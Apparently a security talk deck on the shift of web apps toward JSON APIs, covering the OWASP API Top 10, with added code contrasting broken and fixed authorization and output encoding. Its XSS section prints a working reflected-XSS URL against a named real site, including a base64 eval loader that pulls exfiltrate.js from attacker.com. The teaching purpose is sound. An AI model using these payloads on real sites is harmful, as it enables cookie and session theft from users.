Web Apps: APIs' Nightmare
TRUE SECURITY
www.char49.com
Who Am I
Paulo Silva
● Security Researcher/Pentester
● 15+ years as a Software Developer
● Long-term OWASP Volunteer
● Strong believer in spreading security awareness
@pauloasilva_com
/devpauloasilva
paulo@char49.com
source: https://home.cern/science/computing/birth-web
Traditional Web Applications

Client <--HTTP--> Server (PHP + Database)

Server-side layout:
  scripts/  main.js ...
  style/    display.css ...
  images/   background.js ...
  php/      index.php, login.php ...

Request sequence (response Content-Type on the right):
  GET  /                   text/html
  GET  /scripts/main.js    application/javascript
  GET  /style/display.css  text/css
  ...
  GET  /login.php          text/html
  POST /login.php          text/html

Every interaction, the login form included, is a server-rendered page: the server owns the HTML, the state and the logic, and the client only follows links and submits forms.
Mobile Applications

Client (mobile app) <--HTTP--> Server (PHP + Database)

Server-side layout:
  php/  auth.php, users.php, posts.php, comments.php ...

Request sequence (response Content-Type on the right):
  POST /login      application/json
  GET  /users/me   application/json
  GET  /posts/     application/json
  ...

No HTML is served at all: the client is a native app, and every exchange is JSON against an API that the server must now protect on its own, without a rendered page in between.
Connected Things (Internet of Things)

Client (device) <--HTTP--> Server: API 1, API 2, API 3 ... API N
Behind the APIs: DB 1, DB 2, 3rd Party APIs, Service 1, Service 2, Service 3, Service 4 ... Service N

Request sequence (response Content-Type on the right):
  GET  /device/config  application/json
  POST /device/auth    application/json
  POST /location       application/json
  ...

The single PHP backend has become many APIs, each fronting its own databases, internal services and third-party APIs; the device talks to all of them over JSON.
Modern Web Applications

Client (browser) <--HTTP--> Server: API 1, API 2, API 3 ... API N, plus static files under public/ (index.html, bundle.js ...)
Behind the APIs: DB 1, DB 2, 3rd Party APIs, Service 1, Service 2, Service 3, Service 4 ... Service N

Request sequence (response Content-Type on the right):
  GET  /             text/html
  GET  /bundle.js    application/javascript
  POST /login        application/json
  ...
  GET  /places/1234  application/json
  ...

After one HTML shell and one JavaScript bundle, the browser behaves like the mobile app or the device: everything that matters happens over JSON APIs, against the same kind of API backend that serves the other clients.
OWASP API Security Top 10 (2023)

Once the attack surface is the API itself rather than the rendered page, these are the failure classes that matter:

API1:2023  Broken Object Level Authorization
API2:2023  Broken Authentication
API3:2023  Broken Object Property Level Authorization
API4:2023  Unrestricted Resource Consumption
API5:2023  Broken Function Level Authorization
API6:2023  Unrestricted Access to Sensitive Business Flows
API7:2023  Server Side Request Forgery
API8:2023  Security Misconfiguration
API9:2023  Improper Inventory Management
API10:2023 Unsafe Consumption of APIs
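Added example, not code from the talk: API1 (object level) and API3 (object property level) authorization failures, shown on the deck's own GET /places/1234 route. The in-memory store, the field names, the session shape and the 404-for-everything policy are assumptions made for this example; there is no framework, the handlers are plain functions returning { status, body } so they can be exercised offline.

```javascript
// Added example (not from the talk): BOLA (API1) and property-level
// authorization (API3) on a hypothetical GET /places/:id handler.

// Constructed data: two users, each owning one place. "internalNotes" is a
// server-only property that must never be serialised to a client.
const PLACES = new Map([
  [1234, { id: 1234, ownerId: 'u1', name: 'Garage', lat: 38.72, lng: -9.14, internalNotes: 'key under mat' }],
  [5678, { id: 5678, ownerId: 'u2', name: 'Office', lat: 41.15, lng: -8.61, internalNotes: 'alarm code 4711' }],
]);

// Path parameter validation: only a short decimal id is accepted.
function parsePlaceId(raw) {
  return /^\d{1,10}$/.test(String(raw)) ? Number(raw) : null;
}

// Broken handler: authentication is checked, authorization is not. Any
// logged-in user can walk the id space (API1), and the raw record is returned,
// so internalNotes leaks as well (API3).
function getPlaceBroken(session, rawId) {
  if (!session) return { status: 401, body: { error: 'unauthenticated' } };
  const id = parsePlaceId(rawId);
  if (id === null) return { status: 400, body: { error: 'bad id' } };
  const place = PLACES.get(id);
  if (!place) return { status: 404, body: { error: 'not found' } };
  return { status: 200, body: place };
}

// Fixed handler: the decision is made against the object itself (the caller
// must be its owner), and the response is assembled from an allowlist of
// properties instead of the stored record.
const PUBLIC_FIELDS = ['id', 'name', 'lat', 'lng'];

function toPublic(place) {
  return Object.fromEntries(PUBLIC_FIELDS.map((k) => [k, place[k]]));
}

function getPlaceFixed(session, rawId) {
  if (!session) return { status: 401, body: { error: 'unauthenticated' } };
  const id = parsePlaceId(rawId);
  if (id === null) return { status: 400, body: { error: 'bad id' } };
  const place = PLACES.get(id);
  // One answer for "does not exist" and "not yours": an attacker enumerating
  // ids learns nothing about which ones are valid.
  if (!place || place.ownerId !== session.userId) {
    return { status: 404, body: { error: 'not found' } };
  }
  return { status: 200, body: toPublic(place) };
}

// The BOLA check a tester actually runs: request an id as its owner, then
// replay the identical request with a second account's session.
function bolaCheck(handler, ownerSession, otherSession, rawId) {
  const asOwner = handler(ownerSession, rawId).status;
  const asOther = handler(otherSession, rawId).status;
  return { asOwner, asOther, vulnerable: asOwner === 200 && asOther === 200 };
}
```

Two design points: the ownership comparison happens on the loaded object, not on the request (an "is the user logged in" middleware cannot express this rule), and the public view is an allowlist, so a column added to the store tomorrow does not silently become part of the API. Whether a non-owner gets 404 or 403 is a choice; 404 is used here so the response does not confirm that the id exists.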
Cross-Site Scripting

Vulnerable parameter: ke is reflected into the response without encoding, so a tag in its value becomes part of the page:

https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=alert(document.cookie)>

Loader and Payload: the alert only proves execution. The same injection point carries a loader, an onerror handler that decodes a base64 blob and evaluates it:

https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=eval(atob("KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ=="))>

Malicious Script: decoded, the blob is nothing more than a script injector; the real payload (exfiltrate.js) lives on the attacker's host and is fetched at runtime, so it can be changed without touching the URL:

(() => {
  const script = document.createElement('script');
  script.src = 'https://attacker.com/exfiltrate.js';
  document.body.appendChild(script);
})()

Building blocks of the attack, as the deck labels them: Payload, Malicious Script, HTTP Fundamentals.
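Added example, not code from the talk: the reflection pattern behind the URL above, written as a hypothetical server-side renderer that copies the ke parameter into HTML, beside the encoded version, plus a decoder for the slide's base64 loader so its behaviour can be checked rather than trusted. The template text and the probe value are constructed for this example; only the base64 string is taken from the slide.

```javascript
// Added example (not from the talk): reflected XSS in an HTML text context,
// the hardened renderer, and what the slide's loader decodes to.

// Base64 blob copied from the slide's onerror=eval(atob("...")) loader.
const LOADER_B64 =
  'KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==';

// Decode the loader the same way the browser does (atob); fall back to Buffer
// on runtimes without a global atob. The content is ASCII, so latin1 is exact.
function decodeLoader(b64) {
  return typeof atob === 'function'
    ? atob(b64)
    : Buffer.from(b64, 'base64').toString('latin1');
}

// Vulnerable rendering (hypothetical template): the parameter is interpolated
// into HTML text unchanged, exactly the bug the ke parameter exhibits.
function renderVulnerable(ke) {
  return `<p>Your number: ${ke}</p>`;
}

// Hardened rendering: HTML-encode the five characters that can change context.
// This is correct for HTML text and quoted attribute values; a value placed
// inside a <script> block or a URL needs that context's encoding instead.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  }[c]));
}
function renderSafe(ke) {
  return `<p>Your number: ${escapeHtml(ke)}</p>`;
}

// Triage check a tester runs over a response: did the injected marker come
// back verbatim (unencoded), or was it neutralised?
function reflectsTag(html, injected) {
  return html.includes(injected);
}

// Constructed probe, identical in shape to the slide's ke value.
const PROBE = '6546546<img src=x onerror=alert(document.cookie)>';
```

Two caveats a practitioner should keep in mind. Marking the session cookie HttpOnly stops the alert(document.cookie) variant from reading it, but not the loader: exfiltrate.js runs in the victim's origin and can call the JSON APIs with the cookie attached automatically, which in an API-driven app is all it needs. A Content-Security-Policy whose script-src excludes 'unsafe-inline' and the attacker's host blocks both the onerror handler and the injected script tag, but it is a second line of defence; output encoding at the point of reflection is the fix.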
Resources

OWASP
● OWASP API Security Project
  ● OWASP API Security Top 10 2023
  ● OWASP API Security Top 10 2019
● Goats
  ● OWASP Vulnerable Web Applications Directory
  ● OWASP crAPI - Completely Ridiculous API
  ● OWASP Juice Shop
● OWASP Cheat Sheets Series
  ● Authentication Cheat Sheet
  ● Authorization Cheat Sheet
  ● GraphQL Cheat Sheet
  ● REST Security Cheat Sheet
  ● Web Service Security Cheat Sheet
● OWASP Secure Coding Practices - Quick Reference Guide
● OWASP Go Secure Coding Practices Guide

Other References
● HTTP
  ● Basics of HTTP - MDN web docs
  ● Cross-Origin Resource Sharing (CORS) - MDN web docs
● API Protocols
  ● REST
    ● Representational state transfer - Wikipedia
    ● Representational State Transfer (REST) - Fielding Dissertation
  ● RPC
    ● Remote procedure call - Wikipedia
    ● OpenRPC
    ● JSON-RPC
    ● XML-RPC
    ● gRPC
  ● GraphQL
    ● Introduction to GraphQL
    ● GraphQL blogposts Series - Checkmarx
    ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify
● MindAPI
  ● MindAPI References

www.char49.com
Thank You!